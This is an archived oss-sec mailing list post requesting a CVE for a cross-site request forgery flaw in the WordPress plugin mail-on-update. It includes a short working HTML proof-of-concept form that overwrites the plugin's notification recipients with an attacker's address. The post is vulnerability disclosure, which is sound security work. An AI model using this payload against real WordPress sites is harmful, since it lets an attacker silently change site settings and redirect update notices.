oss-sec mailing list archives
CVE request: WordPress plugin mail-on-update CSRF
From: Henri Salo <henri () nerv fi>
Date: Thu, 16 May 2013 17:06:11 +0300
Hello, Can I get 2013 CVE for WordPress plugin mail-on-update CSRF vulnerability. PoC for "List of alternative recipients" below. Tested 5.1.0 version. Homepage: http://wordpress.org/extend/plugins/mail-on-update/ Code: http://plugins.svn.wordpress.org/mail-on-update/trunk/ <html><form action="https://example.com/wp/wp-admin/options-general.php?page=mail-on-update" method="post" class="buttom-primary"> <input name="mailonupdate_mailto" type="hidden" value="example0 () example com example1 () example com example2 () example com example3 () example com example4 () example com example5 () example com example6 () example com example7 () example com example8 () example com example9 () example com example10 () example com henri+monkey () nerv fi" /> <input name="submit" type="submit" value="Save"/></form></html> If attacker adds random email to that form default user won't get emails and attacker might be interested to receive these as the email contains information of available plugin updates. --- Henri Salo
Attachment:
signature.asc
Description: Digital signature
Current thread:
- CVE request: WordPress plugin mail-on-update CSRF Henri Salo (May 16)
- Re: CVE request: WordPress plugin mail-on-update CSRF Kurt Seifried (May 18)